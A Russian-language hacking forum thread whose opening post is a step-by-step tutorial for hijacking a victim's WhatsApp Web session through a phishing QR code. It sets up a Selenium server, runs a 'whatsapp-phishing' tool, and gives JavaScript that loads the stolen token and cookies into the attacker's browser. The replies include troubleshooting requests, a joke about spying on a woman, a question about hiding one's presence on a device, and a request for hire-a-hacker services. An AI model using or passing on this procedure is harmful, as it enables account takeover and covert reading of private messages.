Hack WhatsApp (Phishing)

Vander

Well-Known Member
Администратор
16.01.2016
1 024
2 452
#1
Приветствую! В этой статье пойдет речь о взломе, мессенджера WhatsApp.

upload_2016-10-18_21-15-48.png

Для начала, немного истории, не так давно (вроде бы, весной 2016) компания объявила, о том, что вся переписка и личные данные защищены методом «Сквозного шифрования», вот как о нем говорит сама компания:

Сквозное шифрование доступно, в случае если вы и ваши собеседники используете последние версии WhatsApp. Сквозное шифрование гарантирует, что только вы и человек, с которым вы общаетесь, можете прочитать содержимое, и никто кроме Вас. Все сообщения защищены уникальным замком. Только у адресата и у вас есть специальный ключ, который необходим, чтобы разблокировать и прочитать сообщения. Для дополнительной защиты каждое сообщение, которое вы отправляете, имеет уникальный замок и ключ. Все это происходит автоматически: вам не нужно настраивать параметры или создавать специальные секретные чаты, чтобы обеспечить защиту сообщений. Отключить сквозное шифрование невозможно.

Даже администрация мессенджера не в силах расшифровать Ваши данные. Это, безусловно, шикарная новость для пользователей. Но, как известно, безопасность - это иллюзия. Далее будет описан взлом с использованием фишинга.

Начнем.

Во-первых, необходимо скачать Selenium, jar файл отсюда =>
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


upload_2016-10-18_21-16-34.png

Selenium Server – это сервер, который позволяет управлять браузером с удалённой машины, по сети. На той машине, где должен работать браузер, устанавливается и запускается сервер. Затем на другой машине запускается программа, которая, используя специальный драйвер RemoteWebDriver, соединяется с сервером и отправляет ему команды. Затем запускает браузер и выполняет в нём эти команды, используя драйвер, соответствующий этому браузеру.

Затем перейдем в папку, куда он был скачан:

> cd Загрузки/

upload_2016-10-18_21-18-10.png

> chmod a+x (позволим файлу исполнение)

> ./selenium-server-standalone-3.0.0-beta4.jar (стартуем сервер)

upload_2016-10-18_21-19-20.png

Не исключаю, что для корректной работы сервера потребуется geckodriver, его можно взять отсюда:

upload_2016-10-18_21-20-0.png

Теперь необходимо получить утилиту whatsapp-phishing, откроем новое окно терминала и напишем:

> git clone
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться


Затем перейдем в папку с whatsapp-phishing:

> cd whatsapp-phishing

И внимательно выполняем следующие команды:

> npm install

npm(Node.js Package Manager) — менеджер пакетов, входящий в состав Node.js.

Эта команда позволит установить все необходимое, Node.js и Socket.io, которые требуются для запуска веб-сайта и сервера Selenium. Если в процессе вы столкнулись с выводами команды - "Missing", то можно установить все вручную по порядку:

> npm install node.js

> npm install socket.io

> npm install wd

После того, как все необходимое было установлено, вводим в терминале следующую команду:

> nodejs index.js

В случае если вы все сделали правильно, увидите такой вывод:

upload_2016-10-18_21-21-53.png

Теперь, перейдя по ссылке в браузере – localhost:8080, видим это:

upload_2016-10-18_21-22-54.png

Выделенный QR необходимо доставить целевому устройству. Затем оно должно просканировать его своим приложением WhatsApp. Когда все сделано, WhatsApp аутентифицирует браузер, который управляется Selenserver и позволит получать token и document.cookie от целевой системы.

Итак, после того, QR был просканирован, можно скопировать token и document.cookie.

Перейдем в терминал, где запущен whatsapp-phishing и скопируем оттуда следующие строки:

upload_2016-10-18_21-23-52.png

Предлагаю запустить новую вкладку браузера в режиме «приват». В ней перейдем на сайт web.whatsapp.com.

upload_2016-10-18_21-24-50.png

Затем, на этой вкладке откроем режим разработчика:

upload_2016-10-18_21-25-20.png

Пишем в строке:

> var t= (затем копируем сюда код из консоли whatsapp-phishing)

upload_2016-10-18_21-26-6.png
upload_2016-10-18_21-26-24.png

Необходимо очень внимательно это делать, так как синтаксис будет ругаться на скопированные пробелы и т.д.

Затем пишем руками код следующего содержания:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

Жмем enter, и последняя команда:

> login (t)

Теперь перезагрузим вкладку браузера, результатом будет доступ к аккаунту устройства, которое просканировало наш QR в начале.

upload_2016-10-18_21-27-44.png

Спасибо за внимание. Данная публикация не является руководством к действию и предоставлена исключительно для ознакомления.
 
Последнее редактирование:

Inject0r

Well-Known Member
03.09.2016
114
175
#5
Интересная статья, сохраню в свою копилку! :) Правда зачем вообще QR использовать? Вот сколько я WhatApp пользуюсь, никогда не занимался сканированием каких-то кодов через него! Для чего это вообще нужно? Это к тому как убедить простого рядового человека просканировать фишинговый код.
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
#6
Ну все!!! Буду шпионить за женщиной. Шучу.
Отличная статья, спасибо.
 

Vander

Well-Known Member
Администратор
16.01.2016
1 024
2 452
#7
Интересная статья, сохраню в свою копилку! :) Правда зачем вообще QR использовать? Вот сколько я WhatApp пользуюсь, никогда не занимался сканированием каких-то кодов через него! Для чего это вообще нужно? Это к тому как убедить простого рядового человека просканировать фишинговый код.
Это для общего развития статья)) А не конкретная инструкция.
 
11.10.2016
5
1
#8
ругается на geckodriver , что делать с ним?
Скачал с репозитории , что дальше?
 

Inject0r

Well-Known Member
03.09.2016
114
175
#9
Vander, помоги пожалуйста :)

не совсем понятно как связать geckodriver с системой. Скачал его, установил, даже запустил командой ./geckodriver -b /usr/bin/firefox. Драйвер пишет, что Listening on 127.0.0.1:4444. Вот непонятно куда этот порт привязать? Кто должен сюда подключиться? Этот адрес прописать как прокси в мозиле? Или что? В любом случае у меня при подключении к
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
появляется только одна надпись: LOADING
 
11.10.2016
5
1
#10
Vander, помоги пожалуйста :)

не совсем понятно как связать geckodriver с системой. Скачал его, установил, даже запустил командой ./geckodriver -b /usr/bin/firefox. Драйвер пишет, что Listening on 127.0.0.1:4444. Вот непонятно куда этот порт привязать? Кто должен сюда подключиться? Этот адрес прописать как прокси в мозиле? Или что? В любом случае у меня при подключении к
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
появляется только одна надпись: LOADING
Такая же проблема при подключение на localhost:8080 запись LOADING и ошибка в standalone server ( The path to the driver executable must be set by the webdriver.gecko.driver system property )
 

Vander

Well-Known Member
Администратор
16.01.2016
1 024
2 452
#11
Vander, помоги пожалуйста :)

не совсем понятно как связать geckodriver с системой. Скачал его, установил, даже запустил командой ./geckodriver -b /usr/bin/firefox. Драйвер пишет, что Listening on 127.0.0.1:4444. Вот непонятно куда этот порт привязать? Кто должен сюда подключиться? Этот адрес прописать как прокси в мозиле? Или что? В любом случае у меня при подключении к
Чтобы видеть этот контент необходимо: Войти или зарегистрироваться
появляется только одна надпись: LOADING
Привет! Извини за задержку с ответом! Разобрался что к чему?
 

MonMJK

Active Member
27.11.2016
34
13
#15
А вот скажите а как скрыть свое присутствие в устроистве?
 
07.06.2017
1
0
#16
Добрый день! Случайно зашла на этот форум. Ищу того, кто реально оказывает услуги по данной теме. Может подскажет кто, к кому обратиться можно. chernova0311@yandex.ru
 
30.04.2017
5
0
#17
Я немного не понял смысла, т.к. с тем же успехом можно просто отсканировать qr-код в браузерной версии